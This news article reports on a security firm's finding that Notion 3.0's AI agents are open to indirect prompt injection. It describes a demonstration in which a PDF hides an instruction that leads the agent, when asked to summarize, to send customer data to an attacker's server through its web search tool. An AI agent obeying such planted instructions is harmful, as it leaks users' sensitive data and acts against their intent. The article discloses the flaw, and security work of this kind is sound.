With the release of Notion 3.0, its new autonomous AI agent feature has attracted significant attention, designed to help users automatically complete tasks such as drafting documents, updating databases, and managing workflows. However, a recent report from the cybersecurity company CodeIntegrity revealed a serious security vulnerability in these AI agents: malicious files, such as PDFs, can be exploited to trick the agents into bypassing security protections and stealing sensitive data.

Hacker Cyber Attack (1)

CodeIntegrity attributes this vulnerability to the "fatal trio" of AI agents: large language models (LLMs), tool access permissions, and long-term memory. Researchers pointed out that traditional access control measures, such as role-based access control (RBAC), are insufficient to provide adequate protection in this complex environment.

The core of the vulnerability is Notion 3.0's built-in web search tool functions.search. Although its original purpose is to help AI agents obtain external information, this tool is extremely vulnerable to manipulation for data theft.

To demonstrate this, the CodeIntegrity team conducted a demonstration attack: they created a seemingly harmless PDF file containing a hidden malicious instruction that directed the AI agent to upload sensitive customer data to a server controlled by the attacker via the web search tool. Once the user uploaded this PDF to Notion and asked the agent to "summarize the report," the agent would faithfully execute the hidden instruction, extracting and transmitting the data. Notably, this attack was successful even when using the advanced language model Claude Sonnet 4.0, indicating that even advanced protective measures were unable to prevent this vulnerability.

The report also warns that this issue is not limited to PDF files. The AI agents in Notion 3.0 can connect to third-party services such as GitHub, Gmail, or Jira, and any integration could potentially serve as a carrier for indirect prompt injection. Malicious content can then infiltrate, prompting the AI agent to perform inappropriate actions, thereby going against the user's intent.